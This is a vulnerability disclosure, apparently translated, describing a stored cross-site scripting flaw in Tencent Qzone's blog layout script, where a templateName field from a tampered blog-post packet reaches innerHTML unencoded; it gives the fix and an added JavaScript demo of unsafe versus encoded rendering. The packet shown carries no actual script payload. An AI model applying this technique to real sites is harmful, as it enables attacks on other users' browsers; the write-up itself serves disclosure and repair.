1. First, look at the relevant part of the code from the first vulnerability in this series (CONTENT_GRIDSBLOG.JS).
To fix that loophole, Tencent switched to the safer JSON.parse as the repair scheme. There is no problem with that fix.
Other websites with similar flaws can refer to Tencent's repair plan.
2. In fact, there is another flaw not far below that code, as shown in the following illustration:
As you can see, oGridInfo is the [Object] returned by JSON.parse.
oGridInfo.templateName is then taken out and, without any filtering, written into innerHTML.
And from the captured data, the templateName field in the JSON is controllable, so there is obviously a problem here.
3. Modify the templateName in the blog-post packet and send it.
{"G0": {"visible": 1, "id": 0, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "?????????"},
 "G5": {"visible": 1, "id": 5, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "?????????"},
 "G1": {"visible": 1, "id": 1, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "???????"},
 "templateName": "
",
 "G4": {"visible": 1, "id": 4, "content": {"mood": "", "image": "", "date": "2013-03-20&1", "text": ""}, "type": 0, "title": "???? 2013-3-20"},
 "G7": {"visible": 1, "id": 7, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "??????????"},
 "version": "1.2",
 "G2": {"visible": 1, "id": 2, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "??????"},
 "bgitem": {"bgid": "130", "bgurl": "/qzone/newblog/v5/flashassets/bg130.swf?bgver=1.0&max_age=31104000", "gridcolor": "0xf06368", "alpha": 1, "align": "right", "wordcolor": "0xFFFFFF"},
 "tempid": "",
 "G8": {"visible": 1, "id": 8, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "???????????"},
 "G6": {"visible": 1, "id": 6, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "????????????"},
 "G3": {"visible": 1, "id": 3, "content": {"mood": "", "image": "", "date": "", "text": "1"}, "type": 1, "title": "?????????"}}
4. Use a different account to view the published blog post. The pop-up fires.
Because of the code's logic, this code path only runs when someone else views the blog post, so when testing, view the post containing the flawed templateName from a third-party account.
Repair scheme:
After taking oGridInfo.templateName out, HTMLEncode it before it is written into innerHTML.
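The two code paths described above, modelled in plain JavaScript as an added example (this is not code from the original report or from Tencent's page): the packet is parsed with JSON.parse as in the first fix, the value of templateName is then either concatenated into the markup that innerHTML would receive (the flaw) or HTML-encoded first (the repair scheme). The packet contents, the function names parseGridInfo, htmlEncode, renderTemplateNameUnsafe and renderTemplateNameSafe, and the wrapper markup are all assumptions made for the example; the sample templateName carries a harmless bold tag so the difference is visible without any pop-up.

```javascript
// Added example, not the original Qzone code. Models the second flaw in the
// series (templateName from parsed JSON written to innerHTML unfiltered) and
// the recommended repair (HTMLEncode before insertion). All names below are
// assumptions for the demonstration.

// Constructed sample packet: a cut-down grid-layout JSON whose templateName
// contains markup instead of a plain template name.
const SAMPLE_PACKET = JSON.stringify({
  G0: { visible: 1, id: 0, content: { mood: "", image: "", date: "", text: "1" }, type: 1, title: "grid 0" },
  version: "1.2",
  templateName: 'classic<b id="injected">markup</b>',
  tempid: "",
});

// First fix in the series: parse with JSON.parse instead of evaluating the
// packet, so the packet body can never execute as code. Malformed input is
// rejected rather than falling back to anything looser.
function parseGridInfo(raw) {
  try {
    const obj = JSON.parse(raw);
    return obj !== null && typeof obj === "object" ? obj : null;
  } catch (e) {
    return null;
  }
}

// HTMLEncode: escape the characters that can open or close a tag or break
// out of a quoted attribute value.
function htmlEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The flawed pattern: the string that would be assigned to innerHTML when
// templateName is concatenated in without any filtering. Any tag inside the
// attacker-controlled field is parsed by the browser as real markup.
function renderTemplateNameUnsafe(gridInfo) {
  return '<div class="tpl">' + gridInfo.templateName + "</div>";
}

// The repair scheme: encode before the value reaches innerHTML, so the same
// characters are displayed literally instead of being parsed as tags.
function renderTemplateNameSafe(gridInfo) {
  return '<div class="tpl">' + htmlEncode(gridInfo.templateName) + "</div>";
}

// Detection helper for the demo: after stripping the wrapper we built
// ourselves, does the fragment still contain the start of any tag?
function containsInjectedTag(html) {
  const inner = html.replace(/^<div class="tpl">/, "").replace(/<\/div>$/, "");
  return /<[a-zA-Z!\/]/.test(inner);
}

// Runs both renderers over the constructed packet and reports whether a tag
// from templateName survived into the markup.
function demo() {
  const gridInfo = parseGridInfo(SAMPLE_PACKET);
  const unsafe = renderTemplateNameUnsafe(gridInfo);
  const safe = renderTemplateNameSafe(gridInfo);
  return {
    unsafeInjected: containsInjectedTag(unsafe), // true: markup passes through
    safeInjected: containsInjectedTag(safe),     // false: markup is neutralised
    safe,
  };
}

console.log(demo());
```

In a real page the same effect is obtained with less risk by assigning the template name through textContent (or a DOM text node) instead of building an HTML string at all; the encode-then-innerHTML form is shown because it is the repair the report names.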